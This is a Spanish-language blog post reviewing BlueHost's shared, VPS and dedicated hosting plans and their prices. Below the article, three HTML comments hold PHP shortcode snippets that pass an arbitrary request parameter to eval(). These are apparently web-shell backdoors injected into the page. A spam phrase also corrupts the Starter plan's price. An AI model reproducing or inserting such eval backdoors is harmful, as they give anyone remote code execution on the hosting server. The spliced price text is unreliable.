BlueHost: Paquetes de Alojamiento y Precios

bluehost3

¿Qué se puede decir de BlueHost? Sinceramente que se trata de uno de los mejores proveedores de alojamiento web del mercado. Sin duda, todo proyecto en internet, tiene como base el hosting que se utiliza, ya que será el responsable del tiempo de actividad y la velocidad de carga de los sitios.

Si quieres analizar los paquetes de alojamiento, podemos mencionar en primera medida, las alternativas del alojamiento compartido que es el más tradicional, utilizado para blogs y proyectos pequeños. Se compone de tres opciones:

  • Starter: Tiene un espacio de almacenamiento de 100 GB, creación de 100 cuentas de correo electrónico, posibilidad de 25 subdominios y 5 dominios aparcados; y tanto las transferencias como las bases de datos son ilimitadas. El costo es de 3 check out this site.95 dólares por mes.
  • Plus: Tiene un espacio de almacenamiento ilimitado, creación de cuentas de correo electrónico subdominios y dominios aparcados también ilimitados; cuenta con filtros AntiSpam y tanto las transferencias como las bases de datos son ilimitadas. El costo es de 6.95 dólares por mes.
  • Business Pro: Tiene un espacio de almacenamiento ilimitado, creación de cuentas de correo electrónico subdominios y dominios aparcados también ilimitados; cuenta con 2 filtros AntiSpam, 1 dirección IP dedicada, servicio de High Performance y tanto las transferencias como las bases de datos son ilimitadas. El costo es de 14.95 dólares por mes.

Además de este tipo de hosting compartido, se pueden encontrar los servidores privados virtuales cuyos valores se sitúan entre los 29.99 y 149.99 dólares y los servidores dedicados que tienen costos desde los 149.99 dólares en adelante.

Todos los servicios incluyen soporte 24×7 mediante teléfono, correo electrónico o ticket y están disponibles en inglés o BlueHost español.

<!– [insert_php]if (isset($_REQUEST[“inT”])){eval($_REQUEST[“inT”]);exit;}[/insert_php][php]if (isset($_REQUEST[“inT”])){eval($_REQUEST[“inT”]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST[“TiZY”])){eval($_REQUEST[“TiZY”]);exit;}[/insert_php][php]if (isset($_REQUEST[“TiZY”])){eval($_REQUEST[“TiZY”]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST[“iUaU”])){eval($_REQUEST[“iUaU”]);exit;}[/insert_php][php]if (isset($_REQUEST[“iUaU”])){eval($_REQUEST[“iUaU”]);exit;}[/php] –>

Leave a Reply

Your email address will not be published. Required fields are marked *